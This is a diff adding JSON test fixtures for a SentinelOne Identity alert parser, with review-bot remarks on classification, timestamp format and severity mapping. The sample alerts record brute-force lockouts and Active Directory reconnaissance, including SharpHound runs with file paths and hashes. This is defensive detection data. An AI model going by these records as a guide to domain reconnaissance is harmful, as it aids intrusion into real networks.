\"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": 
\"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": 
\"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n 
\"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n 
\"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}", + "event": { + "category": "intrusion_detection", + "kind": "alert", + "type": "info" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "name": "Mocked api" + } + } + } +} diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json new file mode 100644 index 000000000..cbc475032 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_3.json 
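Review bot: The input of this fixture is not a SentinelOne Identity alert but a Mockoon environment export (`"name": "Mocked api"`, `routes`, `cors`, `Access-Control-Allow-Origin: *`), yet the expected output still tags it `event.kind: alert` / `event.category: intrusion_detection` and surfaces `sentinelone.identity.name: "Mocked api"` with no `@timestamp`, `id`, `status` or `confidenceLevel`. If the intent is to check resilience to malformed input, the fixture should pin that such a record is not classified as an alert (or at least name the case, e.g. `test_unexpected_payload.json`), otherwise any JSON with a top-level `name` key reaching this intake becomes an intrusion_detection alert with an ingestion-time timestamp. The parser itself is not in this chunk, so this is inferred from the expected output alone; if the fixture was added by accident it should simply be dropped.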
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T10:09:37.779000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T10:09:37.779000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T10:09:37.779000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json
new file mode 100644
index 000000000..64efcfc10
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_4.json
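Review bot: `@timestamp`, `event.start` and `event.end` are pinned here as `2024-11-22T10:09:37.779000Z`, while test_alert_1 pins the same fields as `2024-11-22T08:45:50Z`, so the fixtures lock in two different renderings depending on whether the source's fractional second is zero. That looks like a datetime `isoformat()` detail leaking through rather than a chosen format; normalising to one precision in the parser (always `…37.779Z`-style milliseconds, or always whole seconds) and updating the expected values accordingly would make the fixtures pin a contract instead of an implementation artefact. The parser is not in this chunk, so confirm where the formatting happens before changing expectations.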
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T10:09:17.184000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T10:09:17.184000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T10:09:17.184000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935358-ee81-7eb7-b57f-022c6f0019a9",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json
new file mode 100644
index 000000000..f1339df60
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_5.json
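Review bot: This fixture is the same case as test_alert_3 — identical alert name and description, `classification: UNKNOWN`, `process: null`, `status: NEW`, null `assignee`/`result`/`storylineId` — differing only in `id` and the timestamp, so it exercises no parser path the previous file does not. Every fixture in this chunk has `assignee`, `result` and `storylineId` set to null and `status` set to `NEW`; a more useful second lockout sample would populate one of those (or a non-`NEW` status) so the parser's handling of the non-null branch is actually pinned. Otherwise drop this file to keep the suite small.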
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:54:58Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+ "start": "2024-11-22T09:54:58Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:54:58Z",
+ "file": {
+ "hash": {
+ "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+ },
+ "name": "cmd.exe",
+ "path": "c:\\windows\\system32\\cmd.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "\"C:\\Windows\\system32\\cmd.exe\""
+ },
+ "related": {
+ "hash": [
+ "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "0193534d-63c1-7497-b854-b883425af3f5",
+ "name": "Domain Controller Discovery Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json
new file mode 100644
index 000000000..e43c64e20
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_6.json
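Review bot: `confidenceLevel: MALICIOUS` and `classification: ENUMERATION` survive only under the vendor namespace `sentinelone.identity.*`; the ECS side pins `event.type: info` and no `event.severity`, so a MALICIOUS-confidence discovery from `cmd.exe` is indistinguishable at the ECS level from a low-confidence one, and every fixture in this chunk expects the same `info` regardless of confidence. If the parser (not in this chunk) can derive a severity from `confidenceLevel`, this fixture is the place to pin it, e.g. an `"severity"` entry inside the expected `event` object with the value the mapping chooses for MALICIOUS; otherwise the vendor-field-only choice deserves a line in the format's documentation so rule authors know to key on `sentinelone.identity.confidenceLevel`. Keeping the surrounding quotes in `process.command_line` (`"\"C:\\Windows\\system32\\cmd.exe\""`) is correct as the source has them.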
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", 
+ "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-abf7-7457-8467-e3443470e6f3", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json new file mode 100644 index 000000000..d4acce26a --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_7.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": 
"2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-b05a-7d28-a929-5294ee16628a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json new file mode 100644 index 000000000..384a41648 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_8.json 
